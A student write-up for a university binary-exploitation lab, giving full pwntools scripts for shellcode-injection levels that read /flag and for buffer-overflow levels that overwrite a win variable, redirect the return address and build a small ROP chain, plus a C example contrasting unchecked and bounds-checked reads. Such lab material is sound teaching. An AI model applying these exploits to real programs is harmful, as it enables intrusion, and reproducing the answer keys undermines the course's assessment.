Binary Exploitation WriteUp 1 PDF

The document provides instructions for three levels of a shellcode injection challenge and discusses memory errors challenges up to level 6. It describes running Python scripts or GDB to exploit buffer overflows and hijack the control flow to call a win function.

Uploaded by

jjoseph3703

CSE 365 - Binary Exploitation

Shellcode Injection: level 1)


Run the following Python script. Make sure the indentation is exactly as it appears
below, in case copy-pasting throws it off.

import pwn

pwn.context.arch = 'amd64'
chall = "/challenge/babyshell_level1"
r = pwn.process(chall)

payload = pwn.asm("""
    /* open("/flag", 0, 0): rax = 2 (SYS_open), rdi = path, rsi = flags, rdx = mode */
    mov rax, 2
    mov rsi, 0
    mov rdx, 0
    lea rdi, [rip + flagtext]
    syscall

    /* the returned file descriptor becomes the fd argument of read */
    mov rdi, rax

    /* read(fd, rsp, 1000): rax = 0 (SYS_read), the stack top is used as the buffer */
    mov rax, 0
    mov rsi, rsp
    mov rdx, 1000
    syscall

    /* write(1, rsp, 1000): rax = 1 (SYS_write); rsi and rdx still hold the read arguments */
    mov rax, 1
    mov rdi, 1
    syscall

    /* exit(0): rax = 60 (SYS_exit) */
    mov rax, 60
    mov rdi, 0
    syscall

flagtext:
    .ascii "/flag"
""")

r.send(payload)
r.interactive()



Shellcode Injection: level 2)
Run the following Python script. Make sure the indentation is exactly as it appears
below, in case copy-pasting throws it off.

import pwn

pwn.context.arch = 'amd64'
chall = "/challenge/babyshell_level2"
r = pwn.process(chall)

payload = pwn.asm("""
    /* 800-byte nop sled in front of the same shellcode as level 1 */
    .rept 800
    nop
    .endr

    /* open("/flag", 0, 0) */
    mov rax, 2
    mov rsi, 0
    mov rdx, 0
    lea rdi, [rip + flagtext]
    syscall

    mov rdi, rax

    /* read(fd, rsp, 1000) */
    mov rax, 0
    mov rsi, rsp
    mov rdx, 1000
    syscall

    /* write(1, rsp, 1000) */
    mov rax, 1
    mov rdi, 1
    syscall

    /* exit(0) */
    mov rax, 60
    mov rdi, 0
    syscall

flagtext:
    .ascii "/flag"
""")

r.send(payload)
r.interactive()



Shellcode Injection: level 3)
Run the following Python script. Make sure the indentation is exactly as it appears
below, in case copy-pasting throws it off.

#!/usr/bin/env python
import pwn

pwn.context.update(arch="amd64")

asm = pwn.asm("""
    /* zero the flags and mode arguments */
    xor rsi, rsi
    xor rdx, rdx

    /* build "/flag" on the stack: push a mask, then xor the masked string over it */
    mov rax, 0x101010101010101
    push rax
    mov rax, 0x101010101010101 ^ 0x67616c662f
    xor [rsp], rax
    mov rdi, rsp

    /* open("/flag", 0, 0) */
    xor rax, rax
    mov al, 2
    syscall

    mov rdi, rax

    /* read(fd, rsp, 128) */
    xor rax, rax
    mov rsi, rsp
    mov dl, 128
    syscall

    /* write(1, rsp, 128) */
    mov al, 1
    mov dil, 1
    syscall

    /* exit(0) */
    mov al, 60
    xor dil, dil
    syscall
""")

with pwn.process("/challenge/babyshell_level3") as process:
    process.write(asm)
    result = process.readallS()
    print(result)

Memory Errors: level 1.0)



1. Run the challenge using

/challenge/babymem_level1.0

2. Look for the size of your buffer and enter one more than that, since we are trying to
overflow the buffer



3. Use the following website to enter that number of characters (one more than the buffer
size) and press Enter



Character Counter - WordCounter.net: https://wordcounter.net/character-count

Memory Errors: level 1.1)


1. Run the challenge using

/challenge/babymem_level1.1

2. Enter in 200 for the payload size

3. Enter in 200 characters for the payload

Memory Errors: level 2.0)


1. Run the challenge using

/challenge/babymem_level2.0

2. In the following Python script, make sure the indentation is exactly as it appears
below, in case copy-pasting throws it off. You will also have to fill in a value on each
line that has a comment



from pwn import *

p = process('/challenge/babymem_level2.0')

payload = b'A' *   # Use bytes to reach the win variable
payload += p32()   # Set the win variable to the desired value

p.sendline(b'')    # Send a total of bytes

p.sendline(payload)

print(p.recvall().decode())

3. Run the Python script in a split terminal and copy the following values into your
Python script. Here is a screenshot



Memory Errors: level 2.1)
coming soon

Memory Errors: level 3.0)


1. Run the challenge using

gdb /challenge/babymem_level3.0

2. Once in gdb, press Enter, then type run

3. Then press Control + c

4. Then type info functions win

5. From here you can copy and paste all the values you need into the following
Python script and run it

#!/bin/python
import pwn
import os

directory = os.listdir("/challenge")[0]

pwn.context.arch = "amd64"

program = pwn.process(f"/challenge/{directory}")

buffer_size = # enter buffer size here
padding = # enter padding here
return_address_size = 8
win_function_address = pwn.p64() # enter address from gdb

payload_size = buffer_size + padding + return_address_size

# Create the payload: filler up to the saved return address, then the win address
payload = b'a' * (payload_size - len(win_function_address)) + win_function_address

# Pass the payload to the process: the size line first, then the raw payload bytes
program.write(f"{payload_size}\n".encode() + payload)
print(program.readallS())



6. Run the Python file in a split terminal. Here is a screenshot if you are confused

Memory Errors: level 3.1)


coming soon

Memory Errors: level 6.0)


1. Run the challenge using



gdb /challenge/babymem_level6.0

2. Once in gdb, press Enter, then type run

3. Then press Control + c

4. Then type info functions win_authed

5. In a split terminal run the following commands one by one

ROPgadget --binary /challenge/babymem_level6.0 > gadgets.txt


grep -E "pop rdi ; ret" gadgets.txt

6. From here you can copy and paste all the values you need into the following
Python script and run it

#!/bin/python
import pwn
import os

directory = os.listdir("/challenge")[0]

pwn.context.arch = "amd64"

program = pwn.process(f"/challenge/{directory}")

# payload_size = buffer_size + padding + return_address_size

buffer_size = # enter your value here
padding = # enter your value here
pop_rdi_ret_address = pwn.p64() # enter your value here
win_authed_address = pwn.p64() # enter your value here

payload = b"A" * buffer_size        # Fill the buffer
payload += b"B" * padding           # Fill the space between the buffer and the return address
payload += pop_rdi_ret_address      # Address of the pop rdi ; ret gadget
payload += pwn.p64(0x1337)          # Value of 0x1337 for the RDI register (win_authed argument)
payload += win_authed_address       # Overwrite the return address with the win_authed() address

payload_size = len(payload)

# Pass the payload to the process: the size line first, then the raw payload bytes
program.write(f"{payload_size}\n".encode() + payload)
print(program.readallS())



7. Run the Python file in a split terminal. Here is a screenshot if you are confused
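Every Memory Errors level above exploits the same defect: the length the program asks for is handed to read without being compared against the buffer it fills. As an added example that is not part of this writeup or of the challenge source, the following C program puts that unchecked reader beside a bounds-checked one, with a small pipe-fed harness that shows the unchecked reader spilling past a 64-byte buffer while the checked one refuses the same request; BUF_SIZE, FRAME_SIZE and all function names are constructed.

```c
#include <stddef.h>
#include <string.h>
#include <unistd.h>

#define BUF_SIZE   64               /* constructed size; the real challenge buffers differ */
#define FRAME_SIZE (BUF_SIZE + 64)  /* buffer plus a stand-in for what follows it on the stack */

/* Constructed illustration of the pattern the babymem levels exploit (not the
 * challenge source): the user-supplied length goes straight to read(), so a
 * length above the buffer size overwrites whatever follows the buffer (the win
 * variable in level 2.0, the saved return address in levels 3.0 and 6.0). */
static long read_payload_unchecked(int fd, char *buf, size_t claimed_len) {
    return read(fd, buf, claimed_len);
}

/* Hardened form: validate the length against the real buffer size before any
 * byte is written, and refuse (an event worth logging) rather than truncate. */
static long read_payload_checked(int fd, char *buf, size_t buf_cap, size_t claimed_len) {
    if (claimed_len == 0 || claimed_len > buf_cap) return -1;
    return read(fd, buf, claimed_len);
}

/* Stand-in for stdin: a pipe pre-filled with n constructed 'A' bytes (n <= FRAME_SIZE). */
static int payload_pipe(size_t n) {
    char payload[FRAME_SIZE];
    int fds[2];
    memset(payload, 'A', n);
    if (pipe(fds) != 0 || write(fds[1], payload, n) != (ssize_t)n) return -1;
    close(fds[1]);
    return fds[0];
}

/* Runs one reader against a zeroed frame. Returns 1 if bytes past the logical
 * buffer were overwritten, 0 if the write stayed in bounds, -1 if it was refused.
 * The harness caps claimed_len at FRAME_SIZE so this demo stays memory safe;
 * the vulnerable reader itself has no such cap. */
int overflow_check(int hardened, size_t claimed_len) {
    char frame[FRAME_SIZE] = {0};
    if (claimed_len > FRAME_SIZE) return -2;
    int fd = payload_pipe(claimed_len);
    if (fd < 0) return -2;
    long got = hardened ? read_payload_checked(fd, frame, BUF_SIZE, claimed_len)
                        : read_payload_unchecked(fd, frame, claimed_len);
    close(fd);
    if (got < 0) return -1;
    for (size_t i = BUF_SIZE; i < FRAME_SIZE; i++)
        if (frame[i] != 0) return 1;
    return 0;
}
```

Calling overflow_check(0, 100) returns 1 (the unchecked reader wrote 36 bytes past the buffer), while overflow_check(1, 100) returns -1 (refused) and both readers return 0 for a request that fits.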

